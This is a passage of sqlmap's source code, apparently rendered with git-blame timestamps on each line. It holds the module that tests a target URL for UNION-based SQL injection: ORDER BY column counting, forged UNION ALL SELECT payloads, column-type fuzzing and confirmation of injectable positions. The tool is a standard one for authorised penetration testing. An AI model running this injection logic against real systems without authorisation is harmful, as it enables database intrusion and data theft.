2019-05-08 13:47:52 +03:00
#!/usr/bin/env python
2008-10-15 19:38:22 +04:00
"""
2023-01-03 01:24:59 +03:00
Copyright ( c ) 2006 - 2023 sqlmap developers ( https : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2008-10-15 19:38:22 +04:00
"""
2020-03-02 14:43:12 +03:00
import itertools
2017-03-15 18:18:20 +03:00
import logging
2011-02-08 00:00:59 +03:00
import random
2011-01-23 14:35:24 +03:00
import re
2011-01-06 12:26:01 +03:00
2008-10-15 19:38:22 +04:00
from lib . core . agent import agent
2011-02-02 14:22:35 +03:00
from lib . core . common import average
2011-01-31 15:41:39 +03:00
from lib . core . common import Backend
2020-03-02 14:43:12 +03:00
from lib . core . common import getPublicTypeMembers
2011-10-22 01:12:48 +04:00
from lib . core . common import isNullValue
2011-01-31 15:41:39 +03:00
from lib . core . common import listToStrValue
2011-02-02 14:22:35 +03:00
from lib . core . common import popValue
from lib . core . common import pushValue
2011-08-03 13:08:16 +04:00
from lib . core . common import randomInt
2009-04-22 15:48:07 +04:00
from lib . core . common import randomStr
2012-05-08 19:00:23 +04:00
from lib . core . common import readInput
2011-02-25 12:22:44 +03:00
from lib . core . common import removeReflectiveValues
2019-07-01 11:43:05 +03:00
from lib . core . common import setTechnique
2011-08-03 13:08:16 +04:00
from lib . core . common import singleTimeLogMessage
2011-06-08 18:35:23 +04:00
from lib . core . common import singleTimeWarnMessage
2011-02-02 14:22:35 +03:00
from lib . core . common import stdev
2013-01-29 23:53:11 +04:00
from lib . core . common import wasLastResponseDBMSError
2019-03-28 18:04:38 +03:00
from lib . core . compat import xrange
2008-10-15 19:38:22 +04:00
from lib . core . data import conf
from lib . core . data import kb
from lib . core . data import logger
2020-03-02 14:43:12 +03:00
from lib . core . data import queries
2018-04-01 13:45:47 +03:00
from lib . core . decorators import stackedmethod
2012-08-21 13:19:15 +04:00
from lib . core . dicts import FROM_DUMMY_TABLE
2020-03-02 14:43:12 +03:00
from lib . core . enums import FUZZ_UNION_COLUMN
2010-12-08 16:09:27 +03:00
from lib . core . enums import PAYLOAD
2020-03-02 14:43:12 +03:00
from lib . core . settings import FUZZ_UNION_ERROR_REGEX
from lib . core . settings import FUZZ_UNION_MAX_COLUMNS
2012-09-06 17:51:38 +04:00
from lib . core . settings import LIMITED_ROWS_TEST_NUMBER
2011-02-05 17:17:28 +03:00
from lib . core . settings import MAX_RATIO
2019-06-04 15:44:06 +03:00
from lib . core . settings import MIN_RATIO
2011-02-03 19:59:49 +03:00
from lib . core . settings import MIN_STATISTICAL_RANGE
2011-02-02 16:03:24 +03:00
from lib . core . settings import MIN_UNION_RESPONSES
2012-07-11 18:14:20 +04:00
from lib . core . settings import NULL
2019-11-27 14:09:51 +03:00
from lib . core . settings import ORDER_BY_MAX
2011-08-03 13:08:16 +04:00
from lib . core . settings import ORDER_BY_STEP
2019-06-04 15:44:06 +03:00
from lib . core . settings import UNION_MIN_RESPONSE_CHARS
from lib . core . settings import UNION_STDEV_COEFF
2009-04-22 15:48:07 +04:00
from lib . core . unescaper import unescaper
2011-02-02 14:22:35 +03:00
from lib . request . comparison import comparison
2008-10-15 19:38:22 +04:00
from lib . request . connect import Connect as Request
2012-12-06 17:14:19 +04:00
def _findUnionCharCount ( comment , place , parameter , value , prefix , suffix , where = PAYLOAD . WHERE . ORIGINAL ) :
2011-02-02 14:22:35 +03:00
"""
Finds number of columns affected by UNION based injection
"""
retVal = None
2018-04-01 13:45:47 +03:00
@stackedmethod
2018-04-12 13:25:37 +03:00
def _orderByTechnique ( lowerCount = None , upperCount = None ) :
2012-12-06 17:14:19 +04:00
def _orderByTest ( cols ) :
2011-08-03 13:08:16 +04:00
query = agent . prefixQuery ( " ORDER BY %d " % cols , prefix = prefix )
query = agent . suffixQuery ( query , suffix = suffix , comment = comment )
payload = agent . payload ( newValue = query , place = place , parameter = parameter , where = where )
2017-06-05 17:28:19 +03:00
page , headers , code = Request . queryPage ( payload , place = place , content = True , raise404 = False )
2018-09-18 18:03:27 +03:00
return not any ( re . search ( _ , page or " " , re . I ) and not re . search ( _ , kb . pageTemplate or " " , re . I ) for _ in ( " (warning|error): " , " order (by|clause) " , " unknown column " , " failed " ) ) and not kb . heavilyDynamic and comparison ( page , headers , code ) or re . search ( r " data types cannot be compared or sorted " , page or " " , re . I ) is not None
2011-08-03 13:08:16 +04:00
2018-02-14 19:10:44 +03:00
if _orderByTest ( 1 if lowerCount is None else lowerCount ) and not _orderByTest ( randomInt ( ) if upperCount is None else upperCount + 1 ) :
2016-05-30 11:52:30 +03:00
infoMsg = " ' ORDER BY ' technique appears to be usable. "
2011-08-03 18:31:42 +04:00
infoMsg + = " This should reduce the time needed "
2011-08-03 17:26:38 +04:00
infoMsg + = " to find the right number "
2011-08-03 13:08:16 +04:00
infoMsg + = " of query columns. Automatically extending the "
2012-04-23 17:41:36 +04:00
infoMsg + = " range for current UNION query injection technique test "
2011-08-03 13:08:16 +04:00
singleTimeLogMessage ( infoMsg )
2018-02-14 19:10:44 +03:00
lowCols , highCols = 1 if lowerCount is None else lowerCount , ORDER_BY_STEP if upperCount is None else upperCount
2011-08-03 13:08:16 +04:00
found = None
while not found :
2018-02-14 19:10:44 +03:00
if not conf . uCols and _orderByTest ( highCols ) :
2011-08-03 13:08:16 +04:00
lowCols = highCols
highCols + = ORDER_BY_STEP
2019-11-27 14:09:51 +03:00
if highCols > ORDER_BY_MAX :
break
2011-08-03 13:08:16 +04:00
else :
while not found :
2019-01-22 04:29:52 +03:00
mid = highCols - ( highCols - lowCols ) / / 2
2012-12-06 17:14:19 +04:00
if _orderByTest ( mid ) :
2011-08-03 13:08:16 +04:00
lowCols = mid
else :
highCols = mid
if ( highCols - lowCols ) < 2 :
found = lowCols
return found
2015-07-18 18:01:34 +03:00
try :
pushValue ( kb . errorIsNone )
items , ratios = [ ] , [ ]
kb . errorIsNone = False
lowerCount , upperCount = conf . uColsStart , conf . uColsStop
2019-05-20 16:13:52 +03:00
if kb . orderByColumns is None and ( lowerCount == 1 or conf . uCols ) : # Note: ORDER BY is not bullet-proof
2018-05-07 11:48:35 +03:00
found = _orderByTechnique ( lowerCount , upperCount ) if conf . uCols else _orderByTechnique ( )
2021-02-23 14:00:59 +03:00
2015-07-18 18:01:34 +03:00
if found :
kb . orderByColumns = found
infoMsg = " target URL appears to have %d column %s in query " % ( found , ' s ' if found > 1 else " " )
singleTimeLogMessage ( infoMsg )
return found
2019-05-20 16:13:52 +03:00
elif kb . futileUnion :
return None
2015-07-18 18:01:34 +03:00
if abs ( upperCount - lowerCount ) < MIN_UNION_RESPONSES :
upperCount = lowerCount + MIN_UNION_RESPONSES
min_ , max_ = MAX_RATIO , MIN_RATIO
pages = { }
for count in xrange ( lowerCount , upperCount + 1 ) :
query = agent . forgeUnionQuery ( ' ' , - 1 , count , comment , prefix , suffix , kb . uChar , where )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
2017-06-05 17:28:19 +03:00
page , headers , code = Request . queryPage ( payload , place = place , content = True , raise404 = False )
2021-02-23 14:00:59 +03:00
2015-07-18 18:01:34 +03:00
if not isNullValue ( kb . uChar ) :
pages [ count ] = page
2021-02-23 14:00:59 +03:00
2017-06-05 17:28:19 +03:00
ratio = comparison ( page , headers , code , getRatioValue = True ) or MIN_RATIO
2015-07-18 18:01:34 +03:00
ratios . append ( ratio )
min_ , max_ = min ( min_ , ratio ) , max ( max_ , ratio )
items . append ( ( count , ratio ) )
2011-03-17 15:34:29 +03:00
2011-10-22 01:12:48 +04:00
if not isNullValue ( kb . uChar ) :
2023-11-12 22:03:53 +03:00
value = re . escape ( kb . uChar . strip ( " ' " ) )
for regex in ( value , r ' > \ s* %s \ s*< ' % value ) :
2018-05-05 15:33:00 +03:00
contains = [ count for count , content in pages . items ( ) if re . search ( regex , content or " " , re . IGNORECASE ) is not None ]
if len ( contains ) == 1 :
retVal = contains [ 0 ]
2015-07-18 18:01:34 +03:00
break
if not retVal :
2015-11-11 18:07:11 +03:00
if min_ in ratios :
ratios . pop ( ratios . index ( min_ ) )
if max_ in ratios :
ratios . pop ( ratios . index ( max_ ) )
2015-07-18 18:01:34 +03:00
minItem , maxItem = None , None
for item in items :
if item [ 1 ] == min_ :
minItem = item
elif item [ 1 ] == max_ :
maxItem = item
2016-12-20 01:47:39 +03:00
if all ( _ == min_ and _ != max_ for _ in ratios ) :
2015-07-18 18:01:34 +03:00
retVal = maxItem [ 0 ]
2016-12-20 01:47:39 +03:00
elif all ( _ != min_ and _ == max_ for _ in ratios ) :
2015-07-18 18:01:34 +03:00
retVal = minItem [ 0 ]
elif abs ( max_ - min_ ) > = MIN_STATISTICAL_RANGE :
2019-05-30 22:25:31 +03:00
deviation = stdev ( ratios )
2015-07-18 18:01:34 +03:00
2019-05-30 22:25:31 +03:00
if deviation is not None :
lower , upper = average ( ratios ) - UNION_STDEV_COEFF * deviation , average ( ratios ) + UNION_STDEV_COEFF * deviation
2015-07-18 18:01:34 +03:00
2019-05-30 22:25:31 +03:00
if min_ < lower :
retVal = minItem [ 0 ]
2018-03-11 05:34:31 +03:00
2019-05-30 22:25:31 +03:00
if max_ > upper :
if retVal is None or abs ( max_ - upper ) > abs ( min_ - lower ) :
retVal = maxItem [ 0 ]
2015-07-18 18:01:34 +03:00
finally :
kb . errorIsNone = popValue ( )
2011-02-02 14:22:35 +03:00
2011-02-03 19:16:38 +03:00
if retVal :
2013-04-09 13:48:42 +04:00
infoMsg = " target URL appears to be UNION injectable with %d columns " % retVal
2019-08-30 15:43:56 +03:00
singleTimeLogMessage ( infoMsg , logging . INFO , re . sub ( r " \ d+ " , ' N ' , infoMsg ) )
2011-02-03 19:16:38 +03:00
2011-02-02 14:22:35 +03:00
return retVal
2020-03-02 14:43:12 +03:00
def _fuzzUnionCols ( place , parameter , prefix , suffix ) :
retVal = None
if Backend . getIdentifiedDbms ( ) and not re . search ( FUZZ_UNION_ERROR_REGEX , kb . pageTemplate or " " ) and kb . orderByColumns :
comment = queries [ Backend . getIdentifiedDbms ( ) ] . comment . query
choices = getPublicTypeMembers ( FUZZ_UNION_COLUMN , True )
random . shuffle ( choices )
for candidate in itertools . product ( choices , repeat = kb . orderByColumns ) :
if retVal :
break
elif FUZZ_UNION_COLUMN . STRING not in candidate :
continue
else :
candidate = [ _ . replace ( FUZZ_UNION_COLUMN . INTEGER , str ( randomInt ( ) ) ) . replace ( FUZZ_UNION_COLUMN . STRING , " ' %s ' " % randomStr ( 20 ) ) for _ in candidate ]
query = agent . prefixQuery ( " UNION ALL SELECT %s %s " % ( ' , ' . join ( candidate ) , FROM_DUMMY_TABLE . get ( Backend . getIdentifiedDbms ( ) , " " ) ) , prefix = prefix )
query = agent . suffixQuery ( query , suffix = suffix , comment = comment )
payload = agent . payload ( newValue = query , place = place , parameter = parameter , where = PAYLOAD . WHERE . NEGATIVE )
page , headers , code = Request . queryPage ( payload , place = place , content = True , raise404 = False )
if not re . search ( FUZZ_UNION_ERROR_REGEX , page or " " ) :
for column in candidate :
if column . startswith ( " ' " ) and column . strip ( " ' " ) in ( page or " " ) :
retVal = [ ( _ if _ != column else " %s " ) for _ in candidate ]
break
return retVal
2012-12-06 17:14:19 +04:00
def _unionPosition ( comment , place , parameter , prefix , suffix , count , where = PAYLOAD . WHERE . ORIGINAL ) :
2010-10-31 19:58:38 +03:00
validPayload = None
2011-01-12 15:01:32 +03:00
vector = None
2010-03-22 18:39:29 +03:00
2019-05-02 11:22:44 +03:00
positions = [ _ for _ in xrange ( 0 , count ) ]
2011-02-08 00:00:59 +03:00
# Unbiased approach for searching appropriate usable column
random . shuffle ( positions )
2015-10-13 14:04:59 +03:00
for charCount in ( UNION_MIN_RESPONSE_CHARS << 2 , UNION_MIN_RESPONSE_CHARS ) :
if vector :
break
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions :
# Prepare expression with delimiters
randQuery = randomStr ( charCount )
2017-12-04 15:24:51 +03:00
phrase = ( " %s %s %s " % ( kb . chars . start , randQuery , kb . chars . stop ) ) . lower ( )
2015-10-13 14:04:59 +03:00
randQueryProcessed = agent . concatQuery ( " \' %s \' " % randQuery )
randQueryUnescaped = unescaper . escape ( randQueryProcessed )
# Forge the union SQL injection request
query = agent . forgeUnionQuery ( randQueryUnescaped , position , count , comment , prefix , suffix , kb . uChar , where )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
# Perform the request
2017-06-05 17:28:19 +03:00
page , headers , _ = Request . queryPage ( payload , place = place , content = True , raise404 = False )
2017-12-04 15:24:51 +03:00
content = ( " %s %s " % ( removeReflectiveValues ( page , payload ) or " " , removeReflectiveValues ( listToStrValue ( headers . headers if headers else None ) , payload , True ) or " " ) ) . lower ( )
2015-10-13 14:04:59 +03:00
if content and phrase in content :
validPayload = payload
kb . unionDuplicates = len ( re . findall ( phrase , content , re . I ) ) > 1
2020-03-02 14:43:12 +03:00
vector = ( position , count , comment , prefix , suffix , kb . uChar , where , kb . unionDuplicates , conf . forcePartial , kb . tableFrom , kb . unionTemplate )
2015-10-13 14:04:59 +03:00
if where == PAYLOAD . WHERE . ORIGINAL :
# Prepare expression with delimiters
randQuery2 = randomStr ( charCount )
2017-12-04 15:24:51 +03:00
phrase2 = ( " %s %s %s " % ( kb . chars . start , randQuery2 , kb . chars . stop ) ) . lower ( )
2015-10-13 14:04:59 +03:00
randQueryProcessed2 = agent . concatQuery ( " \' %s \' " % randQuery2 )
randQueryUnescaped2 = unescaper . escape ( randQueryProcessed2 )
# Confirm that it is a full union SQL injection
query = agent . forgeUnionQuery ( randQueryUnescaped , position , count , comment , prefix , suffix , kb . uChar , where , multipleUnions = randQueryUnescaped2 )
2012-09-06 17:51:38 +04:00
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
# Perform the request
2017-06-05 17:28:19 +03:00
page , headers , _ = Request . queryPage ( payload , place = place , content = True , raise404 = False )
2017-12-04 15:24:51 +03:00
content = ( " %s %s " % ( page or " " , listToStrValue ( headers . headers if headers else None ) or " " ) ) . lower ( )
2015-10-13 14:04:59 +03:00
if not all ( _ in content for _ in ( phrase , phrase2 ) ) :
2020-03-02 14:43:12 +03:00
vector = ( position , count , comment , prefix , suffix , kb . uChar , where , kb . unionDuplicates , True , kb . tableFrom , kb . unionTemplate )
2015-10-13 14:04:59 +03:00
elif not kb . unionDuplicates :
fromTable = " FROM ( %s ) AS %s " % ( " UNION " . join ( " SELECT %d %s %s " % ( _ , FROM_DUMMY_TABLE . get ( Backend . getIdentifiedDbms ( ) , " " ) , " AS %s " % randomStr ( ) if _ == 0 else " " ) for _ in xrange ( LIMITED_ROWS_TEST_NUMBER ) ) , randomStr ( ) )
# Check for limited row output
query = agent . forgeUnionQuery ( randQueryUnescaped , position , count , comment , prefix , suffix , kb . uChar , where , fromTable = fromTable )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
# Perform the request
2017-06-05 17:28:19 +03:00
page , headers , _ = Request . queryPage ( payload , place = place , content = True , raise404 = False )
2017-12-04 15:24:51 +03:00
content = ( " %s %s " % ( removeReflectiveValues ( page , payload ) or " " , removeReflectiveValues ( listToStrValue ( headers . headers if headers else None ) , payload , True ) or " " ) ) . lower ( )
2015-10-13 14:04:59 +03:00
if content . count ( phrase ) > 0 and content . count ( phrase ) < LIMITED_ROWS_TEST_NUMBER :
warnMsg = " output with limited number of rows detected. Switching to partial mode "
2022-06-22 13:04:34 +03:00
logger . warning ( warnMsg )
2020-03-02 14:43:12 +03:00
vector = ( position , count , comment , prefix , suffix , kb . uChar , where , kb . unionDuplicates , True , kb . tableFrom , kb . unionTemplate )
2015-10-13 14:04:59 +03:00
unionErrorCase = kb . errorIsNone and wasLastResponseDBMSError ( )
if unionErrorCase and count > 1 :
warnMsg = " combined UNION/error-based SQL injection case found on "
warnMsg + = " column %d . sqlmap will try to find another " % ( position + 1 )
warnMsg + = " column with better characteristics "
2022-06-22 13:04:34 +03:00
logger . warning ( warnMsg )
2015-10-13 14:04:59 +03:00
else :
break
2009-04-22 15:48:07 +04:00
2011-01-12 15:01:32 +03:00
return validPayload , vector
2010-03-22 18:39:29 +03:00
2012-12-06 17:14:19 +04:00
def _unionConfirm ( comment , place , parameter , prefix , suffix , count ) :
2010-10-31 19:58:38 +03:00
validPayload = None
2011-01-12 15:01:32 +03:00
vector = None
2010-03-22 18:39:29 +03:00
2012-10-28 02:36:09 +04:00
# Confirm the union SQL injection and get the exact column
2010-11-14 01:47:37 +03:00
# position which can be used to extract data
2012-12-06 17:14:19 +04:00
validPayload , vector = _unionPosition ( comment , place , parameter , prefix , suffix , count )
2011-01-12 04:13:32 +03:00
2012-10-28 02:36:09 +04:00
# Assure that the above function found the exploitable full union
2011-01-12 04:13:32 +03:00
# SQL injection position
if not validPayload :
2012-12-06 17:14:19 +04:00
validPayload , vector = _unionPosition ( comment , place , parameter , prefix , suffix , count , where = PAYLOAD . WHERE . NEGATIVE )
2011-01-12 04:13:32 +03:00
2011-01-12 15:01:32 +03:00
return validPayload , vector
2008-12-22 00:39:53 +03:00
2012-12-06 17:14:19 +04:00
def _unionTestByCharBruteforce ( comment , place , parameter , value , prefix , suffix ) :
2008-10-15 19:38:22 +04:00
"""
2013-04-09 13:48:42 +04:00
This method tests if the target URL is affected by an union
2008-10-15 19:38:22 +04:00
SQL injection vulnerability . The test is done up to 50 columns
on the target database table
"""
2011-01-12 01:18:47 +03:00
validPayload = None
2011-01-12 15:01:32 +03:00
vector = None
2018-05-07 11:48:35 +03:00
orderBy = kb . orderByColumns
uChars = ( conf . uChar , kb . uChar )
2020-03-02 14:43:12 +03:00
where = PAYLOAD . WHERE . ORIGINAL if isNullValue ( kb . uChar ) else PAYLOAD . WHERE . NEGATIVE
2008-10-15 19:38:22 +04:00
2011-06-18 14:51:14 +04:00
# In case that user explicitly stated number of columns affected
if conf . uColsStop == conf . uColsStart :
count = conf . uColsStart
else :
2020-03-02 14:43:12 +03:00
count = _findUnionCharCount ( comment , place , parameter , value , prefix , suffix , where )
2011-02-03 19:16:38 +03:00
if count :
2012-12-06 17:14:19 +04:00
validPayload , vector = _unionConfirm ( comment , place , parameter , prefix , suffix , count )
2008-12-22 00:39:53 +03:00
2020-03-02 14:43:12 +03:00
if not all ( ( validPayload , vector ) ) and not all ( ( conf . uChar , conf . dbms , kb . unionTemplate ) ) :
if Backend . getIdentifiedDbms ( ) and kb . orderByColumns and kb . orderByColumns < FUZZ_UNION_MAX_COLUMNS :
if kb . fuzzUnionTest is None :
msg = " do you want to (re)try to find proper "
msg + = " UNION column types with fuzzy test? [y/N] "
kb . fuzzUnionTest = readInput ( msg , default = ' N ' , boolean = True )
if kb . fuzzUnionTest :
kb . unionTemplate = _fuzzUnionCols ( place , parameter , prefix , suffix )
2011-06-08 20:25:18 +04:00
warnMsg = " if UNION based SQL injection is not detected, "
2011-10-23 12:44:21 +04:00
warnMsg + = " please consider "
2012-05-08 19:00:23 +04:00
2023-09-04 19:34:21 +03:00
if not conf . uChar and count > 1 and kb . uChar == NULL and conf . uValues is None :
2012-05-08 21:28:19 +04:00
message = " injection not exploitable with NULL values. Do you want to try with a random integer value for option ' --union-char ' ? [Y/n] "
2017-04-18 16:48:05 +03:00
2019-08-30 15:43:56 +03:00
if not readInput ( message , default = ' Y ' , boolean = True ) :
2012-05-08 19:00:23 +04:00
warnMsg + = " usage of option ' --union-char ' "
2014-08-20 02:28:33 +04:00
warnMsg + = " (e.g. ' --union-char=1 ' ) "
2012-05-08 19:00:23 +04:00
else :
2012-07-11 18:01:25 +04:00
conf . uChar = kb . uChar = str ( randomInt ( 2 ) )
2012-12-06 17:14:19 +04:00
validPayload , vector = _unionConfirm ( comment , place , parameter , prefix , suffix , count )
2012-05-08 19:00:23 +04:00
2011-10-23 12:44:21 +04:00
if not conf . dbms :
if not conf . uChar :
warnMsg + = " and/or try to force the "
else :
warnMsg + = " forcing the "
2014-08-20 02:28:33 +04:00
warnMsg + = " back-end DBMS (e.g. ' --dbms=mysql ' ) "
2012-05-08 19:00:23 +04:00
2017-12-04 15:24:51 +03:00
if not all ( ( validPayload , vector ) ) and not warnMsg . endswith ( " consider " ) :
2012-05-08 19:00:23 +04:00
singleTimeWarnMessage ( warnMsg )
2011-05-22 19:30:19 +04:00
2019-03-08 17:49:56 +03:00
if orderBy is None and kb . orderByColumns is not None and not all ( ( validPayload , vector ) ) : # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
conf . uChar , kb . uChar = uChars
validPayload , vector = _unionTestByCharBruteforce ( comment , place , parameter , value , prefix , suffix )
2018-05-07 11:48:35 +03:00
2011-01-12 15:01:32 +03:00
return validPayload , vector
2008-10-15 19:38:22 +04:00
2019-06-27 18:28:43 +03:00
@stackedmethod
2011-01-16 04:17:09 +03:00
def unionTest ( comment , place , parameter , value , prefix , suffix ) :
2008-10-15 19:38:22 +04:00
"""
2013-04-09 13:48:42 +04:00
This method tests if the target URL is affected by an union
2008-10-15 19:38:22 +04:00
SQL injection vulnerability . The test is done up to 3 * 50 times
"""
2010-03-27 02:23:25 +03:00
if conf . direct :
return
2018-12-18 01:25:23 +03:00
negativeLogic = kb . negativeLogic
2019-07-01 11:43:05 +03:00
setTechnique ( PAYLOAD . TECHNIQUE . UNION )
2018-12-18 01:25:23 +03:00
try :
if negativeLogic :
pushValue ( kb . negativeLogic )
pushValue ( conf . string )
pushValue ( conf . code )
kb . negativeLogic = False
conf . string = conf . code = None
validPayload , vector = _unionTestByCharBruteforce ( comment , place , parameter , value , prefix , suffix )
finally :
if negativeLogic :
conf . code = popValue ( )
conf . string = popValue ( )
kb . negativeLogic = popValue ( )
2008-10-15 19:38:22 +04:00
2010-11-19 18:48:24 +03:00
if validPayload :
2011-01-27 22:44:24 +03:00
validPayload = agent . removePayloadDelimiters ( validPayload )
2008-10-15 19:38:22 +04:00
2011-01-12 15:01:32 +03:00
return validPayload , vector